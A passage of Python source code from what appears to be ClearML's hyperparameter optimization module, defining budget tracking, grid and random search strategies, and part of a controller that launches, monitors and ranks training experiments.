:param str task_id: The Task id to retrieve scalar from.
:return: Normalized scalar value.
"""
objective = self.get_objective(task_id=task_id)
if objective is None:
return None
# normalize value so we always look for the highest objective value
return self.sign * objective
def get_top_tasks(self, top_k, optimizer_task_id=None):
# type: (int, Optional[str]) -> Sequence[Task]
"""
Return a list of Tasks of the top performing experiments, based on the title/series objective.
:param int top_k: The number of Tasks (experiments) to return.
:param str optimizer_task_id: Parent optimizer Task ID
:return: A list of Task objects, ordered by performance, where index 0 is the best performing Task.
"""
task_filter = {'page_size': int(top_k), 'page': 0}
if optimizer_task_id:
task_filter['parent'] = optimizer_task_id
order_by = self._get_last_metrics_encode_field()
if order_by and (order_by.startswith('last_metrics') or order_by.startswith('-last_metrics')):
parts = order_by.split('.')
if parts[-1] in ('min', 'max', 'last'):
title = hashlib.md5(str(parts[1]).encode('utf-8')).hexdigest()
series = hashlib.md5(str(parts[2]).encode('utf-8')).hexdigest()
minmax = 'min_value' if 'min' in parts[3] else ('max_value' if 'max' in parts[3] else 'value')
order_by = '{}last_metrics.'.join(
('-' if order_by and order_by[0] == '-' else '', title, series, minmax))
if order_by:
task_filter['order_by'] = [order_by]
return Task.get_tasks(task_filter=task_filter)
def _get_last_metrics_encode_field(self):
# type: () -> str
"""
Return encoded representation of the title/series metric.
:return: The objective title/series.
"""
if not self._metric:
title = hashlib.md5(str(self.title).encode('utf-8')).hexdigest()
series = hashlib.md5(str(self.series).encode('utf-8')).hexdigest()
self._metric = title, series
return '{}last_metrics.{}.{}.{}'.format(
'-' if self.sign > 0 else '', self._metric[0], self._metric[1],
('min_value' if self.sign < 0 else 'max_value') if self.extremum else 'value')
class Budget(object):
class Field(object):
def __init__(self, limit=None):
# type: (Optional[float]) -> ()
self.limit = limit
self.current = {}
def update(self, uid, value):
# type: (Union[str, int], float) -> ()
if value is not None:
try:
self.current[uid] = float(value)
except (TypeError, ValueError):
pass
@property
def used(self):
# type: () -> (Optional[float])
if self.limit is None or not self.current:
return None
return sum(self.current.values())/float(self.limit)
def __init__(self, jobs_limit, iterations_limit, compute_time_limit):
# type: (Optional[int], Optional[int], Optional[float]) -> ()
self.jobs = self.Field(jobs_limit)
self.iterations = self.Field(iterations_limit)
self.compute_time = self.Field(compute_time_limit)
def to_dict(self):
# type: () -> (Mapping[str, Mapping[str, float]])
# returned dict is Mapping[Union['jobs', 'iterations', 'compute_time'], Mapping[Union['limit', 'used'], float]]
current_budget = {}
jobs = self.jobs.used
current_budget['jobs'] = {'limit': self.jobs.limit, 'used': jobs if jobs else 0}
iterations = self.iterations.used
current_budget['iterations'] = {'limit': self.iterations.limit, 'used': iterations if iterations else 0}
compute_time = self.compute_time.used
current_budget['compute_time'] = {'limit': self.compute_time.limit, 'used': compute_time if compute_time else 0}
return current_budget
class SearchStrategy(object):
"""
The base search strategy class. Inherit this class to implement your custom strategy.
"""
_tag = 'optimization'
_job_class = ClearmlJob # type: ClearmlJob
def __init__(
self,
base_task_id, # type: str
hyper_parameters, # type: Sequence[Parameter]
objective_metric, # type: Objective
execution_queue, # type: str
num_concurrent_workers, # type: int
pool_period_min=2., # type: float
time_limit_per_job=None, # type: Optional[float]
compute_time_limit=None, # type: Optional[float]
min_iteration_per_job=None, # type: Optional[int]
max_iteration_per_job=None, # type: Optional[int]
total_max_jobs=None, # type: Optional[int]
**_ # type: Any
):
# type: (...) -> ()
"""
Initialize a search strategy optimizer.
:param str base_task_id: The Task ID (str)
:param list hyper_parameters: The list of parameter objects to optimize over.
:param Objective objective_metric: The Objective metric to maximize / minimize.
:param str execution_queue: The execution queue to use for launching Tasks (experiments).
:param int num_concurrent_workers: The maximum number of concurrent running machines.
:param float pool_period_min: The time between two consecutive pools (minutes).
:param float time_limit_per_job: The maximum execution time per single job in minutes. When time limit is
exceeded, the job is aborted. (Optional)
:param float compute_time_limit: The maximum compute time in minutes. When time limit is exceeded,
all jobs aborted. (Optional)
:param int min_iteration_per_job: The minimum iterations (of the Objective metric) per single job (Optional)
:param int max_iteration_per_job: The maximum iterations (of the Objective metric) per single job.
When maximum iterations is exceeded, the job is aborted. (Optional)
:param int total_max_jobs: The total maximum jobs for the optimization process. The default value is ``None``,
for unlimited.
"""
super(SearchStrategy, self).__init__()
self._base_task_id = base_task_id
self._hyper_parameters = hyper_parameters
self._objective_metric = objective_metric
self._execution_queue = execution_queue
self._num_concurrent_workers = num_concurrent_workers
self.pool_period_minutes = pool_period_min
self.time_limit_per_job = time_limit_per_job
self.compute_time_limit = compute_time_limit
self.max_iteration_per_job = max_iteration_per_job
self.min_iteration_per_job = min_iteration_per_job
self.total_max_jobs = total_max_jobs
self._stop_event = Event()
self._current_jobs = []
self._pending_jobs = []
self._num_jobs = 0
self._job_parent_id = None
self._job_project_id = None
self._created_jobs_ids = {}
self._naming_function = None
self._job_project = {}
self.budget = Budget(
jobs_limit=self.total_max_jobs,
compute_time_limit=self.compute_time_limit if self.compute_time_limit else None,
iterations_limit=self.total_max_jobs * self.max_iteration_per_job if
self.max_iteration_per_job and self.total_max_jobs else None
)
self._validate_base_task()
self._optimizer_task = None
def start(self):
# type: () -> ()
"""
Start the Optimizer controller function loop(). If the calling process is stopped, the controller will stop
as well.
.. important::
This function returns only after the optimization is completed or :meth:`stop` was called.
"""
counter = 0
while True:
logger.debug('optimization loop #{}'.format(counter))
if not self.process_step():
break
if self._stop_event.wait(timeout=self.pool_period_minutes * 60.):
break
counter += 1
def stop(self):
# type: () -> ()
"""
Stop the current running optimization loop. Called from a different thread than the :meth:`start`.
"""
self._stop_event.set()
def process_step(self):
# type: () -> bool
"""
Abstract helper function. Implementation is not required. Default use in start default implementation
Main optimization loop, called from the daemon thread created by :meth:`start`.
- Call monitor job on every ``ClearmlJob`` in jobs:
- Check the performance or elapsed time, and then decide whether to kill the jobs.
- Call create_job:
- Check if spare job slots exist, and if they do call create a new job based on previous tested experiments.
:return: True, if continue the optimization. False, if immediately stop.
"""
updated_jobs = []
for job in self._current_jobs:
if self.monitor_job(job):
updated_jobs.append(job)
self._current_jobs = updated_jobs
pending_jobs = []
for job in self._pending_jobs:
if job.is_pending():
pending_jobs.append(job)
else:
self.budget.jobs.update(job.task_id(), 1)
self._pending_jobs = pending_jobs
free_workers = self._num_concurrent_workers - len(self._current_jobs)
# do not create more jobs if we hit the limit
if self.total_max_jobs and self._num_jobs >= self.total_max_jobs:
return bool(self._current_jobs)
# see how many free slots we have and create job
for i in range(max(0, free_workers)):
new_job = self.create_job()
if not new_job:
break
self._num_jobs += 1
new_job.launch(self._execution_queue)
self._current_jobs.append(new_job)
self._pending_jobs.append(new_job)
return bool(self._current_jobs)
def create_job(self):
# type: () -> Optional[ClearmlJob]
"""
Abstract helper function. Implementation is not required. Default use in process_step default implementation
Create a new job if needed. return the newly created job. If no job needs to be created, return ``None``.
:return: A Newly created ClearmlJob object, or None if no ClearmlJob created.
"""
return None
def monitor_job(self, job):
# type: (ClearmlJob) -> bool
"""
Helper function, Implementation is not required. Default use in process_step default implementation.
Check if the job needs to be aborted or already completed.
If returns ``False``, the job was aborted / completed, and should be taken off the current job list
If there is a budget limitation, this call should update
``self.budget.compute_time.update`` / ``self.budget.iterations.update``
:param ClearmlJob job: A ``ClearmlJob`` object to monitor.
:return: False, if the job is no longer relevant.
"""
abort_job = self.update_budget_per_job(job)
if abort_job:
job.abort()
return False
return not job.is_stopped()
def update_budget_per_job(self, job):
abort_job = False
if self.time_limit_per_job:
elapsed = job.elapsed() / 60.
if elapsed > 0:
self.budget.compute_time.update(job.task_id(), elapsed)
if elapsed > self.time_limit_per_job:
abort_job = True
if self.compute_time_limit:
if not self.time_limit_per_job:
elapsed = job.elapsed() / 60.
if elapsed > 0:
self.budget.compute_time.update(job.task_id(), elapsed)
if self.max_iteration_per_job:
iterations = self._get_job_iterations(job)
if iterations > 0:
self.budget.iterations.update(job.task_id(), iterations)
if iterations > self.max_iteration_per_job:
abort_job = True
return abort_job
def get_running_jobs(self):
# type: () -> Sequence[ClearmlJob]
"""
Return the current running ClearmlJob.
:return: List of ClearmlJob objects.
"""
return self._current_jobs
def get_created_jobs_ids(self):
# type: () -> Mapping[str, dict]
"""
Return a Task IDs dict created by this optimizer until now, including completed and running jobs.
The values of the returned dict are the parameters used in the specific job
:return: dict of task IDs (str) as keys, and their parameters dict as values.
"""
return {job_id: job_val[1] for job_id, job_val in self._created_jobs_ids.items()}
def get_created_jobs_tasks(self):
# type: () -> Mapping[str, dict]
"""
Return a Task IDs dict created by this optimizer until now.
The values of the returned dict are the ClearmlJob.
:return: dict of task IDs (str) as keys, and their ClearmlJob as values.
"""
return {job_id: job_val[0] for job_id, job_val in self._created_jobs_ids.items()}
def get_top_experiments(self, top_k):
# type: (int) -> Sequence[Task]
"""
Return a list of Tasks of the top performing experiments, based on the controller ``Objective`` object.
:param int top_k: The number of Tasks (experiments) to return.
:return: A list of Task objects, ordered by performance, where index 0 is the best performing Task.
"""
# noinspection PyProtectedMember
top_tasks = self._get_child_tasks(
parent_task_id=self._job_parent_id or self._base_task_id,
order_by=self._objective_metric._get_last_metrics_encode_field(),
additional_filters={'page_size': int(top_k), 'page': 0})
return top_tasks
def get_objective_metric(self):
# type: () -> (str, str)
"""
Return the metric title, series pair of the objective.
:return: (title, series)
"""
return self._objective_metric.get_objective_metric()
def helper_create_job(
self,
base_task_id, # type: str
parameter_override=None, # type: Optional[Mapping[str, str]]
task_overrides=None, # type: Optional[Mapping[str, str]]
tags=None, # type: Optional[Sequence[str]]
parent=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> ClearmlJob
"""
Create a Job using the specified arguments, ``ClearmlJob`` for details.
:return: A newly created Job instance.
"""
if parameter_override:
param_str = ['{}={}'.format(k, parameter_override[k]) for k in sorted(parameter_override.keys())]
if self._naming_function:
name = self._naming_function(self._base_task_name, parameter_override)
elif self._naming_function is False:
name = None
else:
name = '{}: {}'.format(self._base_task_name, ' '.join(param_str))
comment = '\n'.join(param_str)
else:
name = None
comment = None
tags = (tags or []) + [self._tag, 'opt' + (': {}'.format(self._job_parent_id) if self._job_parent_id else '')]
new_job = self._job_class(
base_task_id=base_task_id, parameter_override=parameter_override,
task_overrides=task_overrides, tags=tags, parent=parent or self._job_parent_id,
name=name, comment=comment,
project=self._job_project_id or self._get_task_project(parent or self._job_parent_id),
**kwargs)
self._created_jobs_ids[new_job.task_id()] = (new_job, parameter_override)
logger.info('Creating new Task: {}'.format(parameter_override))
return new_job
def set_job_class(self, job_class):
# type: (ClearmlJob) -> ()
"""
Set the class to use for the :meth:`helper_create_job` function.
:param ClearmlJob job_class: The Job Class type.
"""
self._job_class = job_class
def set_job_default_parent(self, job_parent_task_id, project_name=None):
# type: (Optional[str], Optional[str]) -> ()
"""
Set the default parent for all Jobs created by the :meth:`helper_create_job` method.
:param str job_parent_task_id: The parent Task ID.
:param str project_name: If specified, create the jobs in the specified project
"""
self._job_parent_id = job_parent_task_id
# noinspection PyProtectedMember
self._job_project_id = get_or_create_project(
session=Task._get_default_session(), project_name=project_name, description='HPO process spawned Tasks') \
if project_name else None
def set_job_naming_scheme(self, naming_function):
# type: (Optional[Callable[[str, dict], str]]) -> ()
"""
Set the function used to name a newly created job.
:param callable naming_function:
.. code-block:: py
naming_functor(base_task_name, argument_dict) -> str
"""
self._naming_function = naming_function
def set_optimizer_task(self, task):
# type: (Task) -> ()
"""
Set the optimizer task object to be used to store/generate reports on the optimization process.
Usually this is the current task of this process.
:param Task task: The optimizer`s current Task.
"""
self._optimizer_task = task
def _validate_base_task(self):
# type: () -> ()
"""
Check the base task exists and contains the requested Objective metric and hyper parameters.
"""
# check if the task exists
try:
task = Task.get_task(task_id=self._base_task_id)
self._base_task_name = task.name
except ValueError:
raise ValueError("Could not find base task id {}".format(self._base_task_id))
# check if the hyper-parameters exist:
task_parameters = task.get_parameters(backwards_compatibility=False)
missing_params = [h.name for h in self._hyper_parameters if h.name not in task_parameters]
if missing_params:
logger.warning('Could not find requested hyper-parameters {} on base task {}'.format(
missing_params, self._base_task_id))
# check if the objective metric exists (i.e. no typos etc)
if self._objective_metric.get_objective(self._base_task_id) is None:
logger.warning('Could not find requested metric {} report on base task {}'.format(
self._objective_metric.get_objective_metric(), self._base_task_id))
def _get_task_project(self, parent_task_id):
# type: (str) -> (Optional[str])
if not parent_task_id:
return
if parent_task_id not in self._job_project:
task = Task.get_task(task_id=parent_task_id)
self._job_project[parent_task_id] = task.project
return self._job_project.get(parent_task_id)
def _get_job_iterations(self, job):
# type: (Union[ClearmlJob, Task]) -> int
iteration_value = self._objective_metric.get_current_raw_objective(job)
return iteration_value[0] if iteration_value else -1
@classmethod
def _get_child_tasks_ids(
cls,
parent_task_id, # type: str
status=None, # type: Optional[Union[Task.TaskStatusEnum], Sequence[Task.TaskStatusEnum]]
order_by=None, # type: Optional[str]
additional_filters=None # type: Optional[dict]
):
# type: (...) -> (Sequence[str])
"""
Helper function. Return a list of tasks is tagged automl, with specific ``status``, ordered by ``sort_field``.
:param str parent_task_id: The base Task ID (parent).
:param status: The current status of requested tasks (for example, ``in_progress`` and ``completed``).
:param str order_by: The field name to sort results.
Examples:
.. code-block:: py
"-last_metrics.title.series.min"
"last_metrics.title.series.max"
"last_metrics.title.series.last"
"execution.parameters.name"
"updated"
:param dict additional_filters: The additional task filters.
:return: A list of Task IDs (str)
"""
task_filter = {
'parent': parent_task_id,
# 'tags': [cls._tag],
# since we have auto archive we do not want to filter out archived tasks
# 'system_tags': ['-archived'],
}
task_filter.update(additional_filters or {})
if status:
task_filter['status'] = status if isinstance(status, (tuple, list)) else [status]
if order_by and (order_by.startswith('last_metrics') or order_by.startswith('-last_metrics')):
parts = order_by.split('.')
if parts[-1] in ('min', 'max', 'last'):
title = hashlib.md5(str(parts[1]).encode('utf-8')).hexdigest()
series = hashlib.md5(str(parts[2]).encode('utf-8')).hexdigest()
minmax = 'min_value' if 'min' in parts[3] else ('max_value' if 'max' in parts[3] else 'value')
order_by = '{}last_metrics.'.join(
('-' if order_by and order_by[0] == '-' else '', title, series, minmax))
if order_by:
task_filter['order_by'] = [order_by]
# noinspection PyProtectedMember
task_objects = Task._query_tasks(**task_filter)
return [t.id for t in task_objects]
@classmethod
def _get_child_tasks(
cls,
parent_task_id, # type: str
status=None, # type: Optional[Union[Task.TaskStatusEnum], Sequence[Task.TaskStatusEnum]]
order_by=None, # type: Optional[str]
additional_filters=None # type: Optional[dict]
):
# type: (...) -> (Sequence[Task])
"""
Helper function. Return a list of tasks tagged automl, with specific ``status``, ordered by ``sort_field``.
:param str parent_task_id: The base Task ID (parent).
:param status: The current status of requested tasks (for example, ``in_progress`` and ``completed``).
:param str order_by: The field name to sort results.
Examples:
.. code-block:: py
"-last_metrics.title.series.min"
"last_metrics.title.series.max"
"last_metrics.title.series.last"
"execution.parameters.name"
"updated"
:param dict additional_filters: The additional task filters.
:return: A list of Task objects
"""
return [
Task.get_task(task_id=t_id) for t_id in cls._get_child_tasks_ids(
parent_task_id=parent_task_id,
status=status,
order_by=order_by,
additional_filters=additional_filters)
]
class GridSearch(SearchStrategy):
"""
Grid search strategy controller. Full grid sampling of every hyper-parameter combination.
"""
def __init__(
self,
base_task_id, # type: str
hyper_parameters, # type: Sequence[Parameter]
objective_metric, # type: Objective
execution_queue, # type: str
num_concurrent_workers, # type: int
pool_period_min=2., # type: float
time_limit_per_job=None, # type: Optional[float]
compute_time_limit=None, # type: Optional[float]
max_iteration_per_job=None, # type: Optional[int]
total_max_jobs=None, # type: Optional[int]
**_ # type: Any
):
# type: (...) -> ()
"""
Initialize a grid search optimizer
:param str base_task_id: The Task ID.
:param list hyper_parameters: The list of parameter objects to optimize over.
:param Objective objective_metric: The Objective metric to maximize / minimize.
:param str execution_queue: The execution queue to use for launching Tasks (experiments).
:param int num_concurrent_workers: The maximum number of concurrent running machines.
:param float pool_period_min: The time between two consecutive pools (minutes).
:param float time_limit_per_job: The maximum execution time per single job in minutes. When the time limit is
exceeded job is aborted. (Optional)
:param float compute_time_limit: The maximum compute time in minutes. When time limit is exceeded,
all jobs aborted. (Optional)
:param int max_iteration_per_job: The maximum iterations (of the Objective metric)
per single job, When exceeded, the job is aborted.
:param int total_max_jobs: The total maximum jobs for the optimization process. The default is ``None``, for
unlimited.
"""
super(GridSearch, self).__init__(
base_task_id=base_task_id, hyper_parameters=hyper_parameters, objective_metric=objective_metric,
execution_queue=execution_queue, num_concurrent_workers=num_concurrent_workers,
pool_period_min=pool_period_min, time_limit_per_job=time_limit_per_job,
compute_time_limit=compute_time_limit, max_iteration_per_job=max_iteration_per_job,
total_max_jobs=total_max_jobs, **_)
self._param_iterator = None
def create_job(self):
# type: () -> Optional[ClearmlJob]
"""
Create a new job if needed. Return the newly created job. If no job needs to be created, return ``None``.
:return: A newly created ClearmlJob object, or None if no ClearmlJob is created.
"""
try:
parameters = self._next_configuration()
except StopIteration:
return None
return self.helper_create_job(base_task_id=self._base_task_id, parameter_override=parameters)
def _next_configuration(self):
# type: () -> Mapping[str, str]
def param_iterator_fn():
hyper_params_values = [p.to_list() for p in self._hyper_parameters]
for state in product(*hyper_params_values):
yield dict(kv for d in state for kv in d.items())
if not self._param_iterator:
self._param_iterator = param_iterator_fn()
return next(self._param_iterator)
class RandomSearch(SearchStrategy):
"""
Random search strategy controller. Random uniform sampling of hyper-parameters.
"""
# Number of already chosen random samples before assuming we covered the entire hyper-parameter space
_hp_space_cover_samples = 42
def __init__(
self,
base_task_id, # type: str
hyper_parameters, # type: Sequence[Parameter]
objective_metric, # type: Objective
execution_queue, # type: str
num_concurrent_workers, # type: int
pool_period_min=2., # type: float
time_limit_per_job=None, # type: Optional[float]
compute_time_limit=None, # type: Optional[float]
max_iteration_per_job=None, # type: Optional[int]
total_max_jobs=None, # type: Optional[int]
**_ # type: Any
):
# type: (...) -> ()
"""
Initialize a random search optimizer.
:param str base_task_id: The Task ID.
:param list hyper_parameters: The list of Parameter objects to optimize over.
:param Objective objective_metric: The Objective metric to maximize / minimize.
:param str execution_queue: The execution queue to use for launching Tasks (experiments).
:param int num_concurrent_workers: The maximum umber of concurrent running machines.
:param float pool_period_min: The time between two consecutive pools (minutes).
:param float time_limit_per_job: The maximum execution time per single job in minutes,
when time limit is exceeded job is aborted. (Optional)
:param float compute_time_limit: The maximum compute time in minutes. When time limit is exceeded,
all jobs aborted. (Optional)
:param int max_iteration_per_job: The maximum iterations (of the Objective metric)
per single job. When exceeded, the job is aborted.
:param int total_max_jobs: The total maximum jobs for the optimization process. The default is ``None``, for
unlimited.
"""
super(RandomSearch, self).__init__(
base_task_id=base_task_id, hyper_parameters=hyper_parameters, objective_metric=objective_metric,
execution_queue=execution_queue, num_concurrent_workers=num_concurrent_workers,
pool_period_min=pool_period_min, time_limit_per_job=time_limit_per_job,
compute_time_limit=compute_time_limit, max_iteration_per_job=max_iteration_per_job,
total_max_jobs=total_max_jobs, **_)
self._hyper_parameters_collection = set()
def create_job(self):
# type: () -> Optional[ClearmlJob]
"""
Create a new job if needed. Return the newly created job. If no job needs to be created, return ``None``.
:return: A newly created ClearmlJob object, or None if no ClearmlJob created
"""
parameters = None
# maximum tries to ge a random set that is not already in the collection
for i in range(self._hp_space_cover_samples):
parameters = {}
for p in self._hyper_parameters:
parameters.update(p.get_value())
# hash the parameters dictionary
param_hash = hash(json.dumps(parameters, sort_keys=True))
# if this is a new set of parameters, use it.
if param_hash not in self._hyper_parameters_collection:
self._hyper_parameters_collection.add(param_hash)
break
# try again
parameters = None
# if we failed to find a random set of parameters, assume we selected all of them
if not parameters:
return None
return self.helper_create_job(base_task_id=self._base_task_id, parameter_override=parameters)
class HyperParameterOptimizer(object):
"""
Hyper-parameter search controller. Clones the base experiment, changes arguments and tries to maximize/minimize
the defined objective.
"""
_tag = 'optimization'
def __init__(
self,
base_task_id, # type: str
hyper_parameters, # type: Sequence[Parameter]
objective_metric_title, # type: str
objective_metric_series, # type: str
objective_metric_sign='min', # type: str
optimizer_class=RandomSearch, # type: type(SearchStrategy)
max_number_of_concurrent_tasks=10, # type: int
execution_queue='default', # type: str
optimization_time_limit=None, # type: Optional[float]
compute_time_limit=None, # type: Optional[float]
auto_connect_task=True, # type: Union[bool, Task]
always_create_task=False, # type: bool
spawn_project=None, # type: Optional[str]
save_top_k_tasks_only=None, # type: Optional[int]
**optimizer_kwargs # type: Any
):
# type: (...) -> ()
"""
Create a new hyper-parameter controller. The newly created object will launch and monitor the new experiments.
:param str base_task_id: The Task ID to be used as template experiment to optimize.
:param list hyper_parameters: The list of Parameter objects to optimize over.
:param str objective_metric_title: The Objective metric title to maximize / minimize (for example,
``validation``).
:param str objective_metric_series: The Objective metric series to maximize / minimize (for example, ``loss``).
:param str objective_metric_sign: The objective to maximize / minimize.
The values are:
- ``min`` - Minimize the last reported value for the specified title/series scalar.
- ``max`` - Maximize the last reported value for the specified title/series scalar.
- ``min_global`` - Minimize the min value of *all* reported values for the specific title/series scalar.
- ``max_global`` - Maximize the max value of *all* reported values for the specific title/series scalar.
:param class.SearchStrategy optimizer_class: The SearchStrategy optimizer to use for the hyper-parameter search
:param int max_number_of_concurrent_tasks: The maximum number of concurrent Tasks (experiments) running at the
same time.
:param str execution_queue: The execution queue to use for launching Tasks (experiments).
:param float optimization_time_limit: The maximum time (minutes) for the entire optimization process. The
default is ``None``, indicating no time limit.
:param float compute_time_limit: The maximum compute time in minutes. When time limit is exceeded,
all jobs aborted. (Optional)
:param bool auto_connect_task: Store optimization arguments and configuration in the Task
The values are:
- ``True`` - The optimization argument and configuration will be stored in the Task. All arguments will
be under the hyper-parameter section ``opt``, and the optimization hyper_parameters space will
stored in the Task configuration object section.
- ``False`` - Do not store with Task.
- ``Task`` - A specific Task object to connect the optimization process with.
:param bool always_create_task: Always create a new Task
The values are:
- ``True`` - No current Task initialized. Create a new task named ``optimization`` in the ``base_task_id``
project.
- ``False`` - Use the :py:meth:`task.Task.current_task` (if exists) to report statistics.
:param str spawn_project: If project name is specified, create all optimization Jobs (Tasks) in the
specified project instead of the original base_task_id project.
:param int save_top_k_tasks_only: If specified and above 0, keep only the top_k performing Tasks,
and archive the rest of the created Tasks. Default: -1 keep everything, nothing will be archived.
:param ** optimizer_kwargs: Arguments passed directly to the optimizer constructor.
Example:
.. code-block:: py
:linenos:
:caption: Example
from clearml import Task
from clearml.automation import UniformParameterRange, DiscreteParameterRange
from clearml.automation import GridSearch, RandomSearch, HyperParameterOptimizer
task = Task.init('examples', 'HyperParameterOptimizer example')
an_optimizer = HyperParameterOptimizer(
base_task_id='fa30fa45d95d4927b87c323b5b04dc44',
hyper_parameters=[
UniformParameterRange('lr', min_value=0.01, max_value=0.3, step_size=0.05),
DiscreteParameterRange('network', values=['ResNet18', 'ResNet50', 'ResNet101']),
],
objective_metric_title='title',
objective_metric_series='series',
objective_metric_sign='min',
max_number_of_concurrent_tasks=5,
optimizer_class=RandomSearch,
execution_queue='workers', time_limit_per_job=120, pool_period_min=0.2)
# This will automatically create and print the optimizer new task id
# for later use. if a Task was already created, it will use it.
an_optimizer.set_time_limit(in_minutes=10.)
an_optimizer.start()
# we can create a pooling loop if we like
while not an_optimizer.reached_time_limit():
top_exp = an_optimizer.get_top_experiments(top_k=3)
print(top_exp)
# wait until optimization completed or timed-out
an_optimizer.wait()
# make sure we stop all jobs
an_optimizer.stop()
"""
# create a new Task, if we do not have one already
self._task = auto_connect_task if isinstance(auto_connect_task, Task) else Task.current_task()
if not self._task and always_create_task:
base_task = Task.get_task(task_id=base_task_id)
self._task = Task.init(
project_name=base_task.get_project_name(),
task_name='Optimizing: {}'.format(base_task.name),
task_type=Task.TaskTypes.optimizer,
)
opts = dict(
base_task_id=base_task_id,
objective_metric_title=objective_metric_title,
objective_metric_series=objective_metric_series,
objective_metric_sign=objective_metric_sign,
max_number_of_concurrent_tasks=max_number_of_concurrent_tasks,
execution_queue=execution_queue,
optimization_time_limit=optimization_time_limit,
compute_time_limit=compute_time_limit,
optimizer_kwargs=optimizer_kwargs)
# make sure all the created tasks are our children, as we are creating them
if self._task:
self._task.add_tags([self._tag])
if auto_connect_task:
optimizer_class, hyper_parameters, opts = self._connect_args(
optimizer_class=optimizer_class, hyper_param_configuration=hyper_parameters, **opts)
self.base_task_id = opts['base_task_id']
self.hyper_parameters = hyper_parameters
self.max_number_of_concurrent_tasks = opts['max_number_of_concurrent_tasks']
self.execution_queue = opts['execution_queue']
self.objective_metric = Objective(
title=opts['objective_metric_title'], series=opts['objective_metric_series'],
order='min' if opts['objective_metric_sign'] in ('min', 'min_global') else 'max',
extremum=opts['objective_metric_sign'].endswith('_global'))
# if optimizer_class is an instance, use it as is.
if type(optimizer_class) != type:
self.optimizer = optimizer_class
else:
self.optimizer = optimizer_class(
base_task_id=opts['base_task_id'], hyper_parameters=hyper_parameters,
objective_metric=self.objective_metric, execution_queue=opts['execution_queue'],
num_concurrent_workers=opts['max_number_of_concurrent_tasks'],
compute_time_limit=opts['compute_time_limit'], **opts.get('optimizer_kwargs', {}))
self.optimizer.set_optimizer_task(self._task)
self.optimization_timeout = None
self.optimization_start_time = None
self._thread = None
self._stop_event = None
self._report_period_min = 5.
self._thread_reporter = None
self._experiment_completed_cb = None
self._save_top_k_tasks_only = max(0, save_top_k_tasks_only or 0)
self.optimizer.set_job_default_parent(
self._task.id if self._task else None, project_name=spawn_project or None)
self.set_time_limit(in_minutes=opts['optimization_time_limit'])
def get_num_active_experiments(self):
# type: () -> int
"""
Return the number of current active experiments.
:return: The number of active experiments.
"""
if not self.optimizer:
return 0
return len(self.optimizer.get_running_jobs())
def get_active_experiments(self):
# type: () -> Sequence[Task]
"""
Return a list of Tasks of the current active experiments.
:return: A list of Task objects, representing the current active experiments.
"""
if not self.optimizer:
return []
return [j.task for j in self.optimizer.get_running_jobs()]
def start(self, job_complete_callback=None):
# type: (Optional[Callable[[str, float, int, dict, str], None]]) -> bool
"""
Start the HyperParameterOptimizer controller. If the calling process is stopped, then the controller stops
as well.
:param Callable job_complete_callback: Callback function, called when a job is completed.
.. code-block:: py
def job_complete_callback(
job_id, # type: str
objective_value, # type: float
objective_iteration, # type: int
job_parameters, # type: dict
top_performance_job_id # type: str
):
pass
:return: True, if the controller started. False, if the controller did not start.
"""
if not self.optimizer:
return False
if self._thread:
return True
self.optimization_start_time = time()
self._experiment_completed_cb = job_complete_callback
self._stop_event = Event()
self._thread = Thread(target=self._daemon)
self._thread.daemon = True
self._thread.start()
self._thread_reporter = Thread(target=self._report_daemon)
self._thread_reporter.daemon = True
self._thread_reporter.start()
return True
def stop(self, timeout=None, wait_for_reporter=True):
# type: (Optional[float], Optional[bool]) -> ()
"""
Stop the HyperParameterOptimizer controller and the optimization thread.
:param float timeout: Wait timeout for the optimization thread to exit (minutes).
The default is ``None``, indicating do not wait terminate immediately.
:param wait_for_reporter: Wait for reporter to flush data.
"""
if not self._thread or not self._stop_event or not self.optimizer:
if self._thread_reporter and wait_for_reporter:
self._thread_reporter.join()
return
_thread = self._thread
self._stop_event.set()
self.optimizer.stop()
# wait for optimizer thread
if timeout is not None:
_thread.join(timeout=timeout * 60.)
# stop all running tasks:
for j in self.optimizer.get_running_jobs():
j.abort()
# clear thread
self._thread = None
if wait_for_reporter:
# wait for reporter to flush
self._thread_reporter.join()
def is_active(self):
# type: () -> bool
"""
Is the optimization procedure active (still running)
The values are:
- ``True`` - The optimization procedure is active (still running).
- ``False`` - The optimization procedure is not active (not still running).
.. note::
If the daemon thread has not yet started, ``is_active`` returns ``True``.
:return: A boolean indicating whether the optimization procedure is active (still running) or stopped.
"""
return self._stop_event is None or self._thread is not None
def is_running(self):
# type: () -> bool
"""
Is the optimization controller is running
The values are:
- ``True`` - The optimization procedure is running.
- ``False`` - The optimization procedure is running.
:return: A boolean indicating whether the optimization procedure is active (still running) or stopped.
"""
return self._thread is not None
def wait(self, timeout=None):
# type: (Optional[float]) -> bool
"""
Wait for the optimizer to finish.
.. note::
This method does not stop the optimizer. Call :meth:`stop` to terminate the optimizer.
:param float timeout: The timeout to wait for the optimization to complete (minutes).
If ``None``, then wait until we reached the timeout, or optimization completed.
:return: True, if the optimization finished. False, if the optimization timed out.
"""
if not self.is_running():
return True
if timeout is not None:
timeout *= 60.
else:
timeout = max(0, self.optimization_timeout - self.optimization_start_time) \
if self.optimization_timeout else None
_thread = self._thread
_thread.join(timeout=timeout)
if _thread.is_alive():
return False
return True
def set_time_limit(self, in_minutes=None, specific_time=None):
# type: (Optional[float], Optional[datetime]) -> ()
"""
Set a time limit for the HyperParameterOptimizer controller. If we reached the time limit, stop the optimization
process. If ``specific_time`` is provided, use it; otherwise, use the ``in_minutes``.
:param float in_minutes: The maximum processing time from current time (minutes).
:param datetime specific_time: The specific date/time limit.
"""
if specific_time:
self.optimization_timeout = specific_time.timestamp()
else:
self.optimization_timeout = (float(in_minutes) * 60.) + time() if in_minutes else None
def get_time_limit(self):
# type: () -> datetime
"""
Return the controller optimization time limit.
:return: The absolute datetime limit of the controller optimization process.
"""
return datetime.fromtimestamp(self.optimization_timeout)
def elapsed(self):
# type: () -> float
"""
Return minutes elapsed from controller stating time stamp.
:return: The minutes from controller start time. A negative value means the process has not started yet.
"""
if self.optimization_start_time is None:
return -1.0
return (time() - self.optimization_start_time) / 60.
def reached_time_limit(self):
# type: () -> bool
"""
Did the optimizer reach the time limit
The values are:
- ``True`` - The time limit passed.
- ``False`` - The time limit did not pass.
This method returns immediately, it does not wait for the optimizer.
:return: True, if optimizer is running and we passed the time limit, otherwise returns False.
"""
if self.optimization_start_time is None:
return False
if not self.is_running():
return False
return time() > self.optimization_timeout
def get_top_experiments(self, top_k):
# type: (int) -> Sequence[Task]
"""
Return a list of Tasks of the top performing experiments, based on the controller ``Objective`` object.
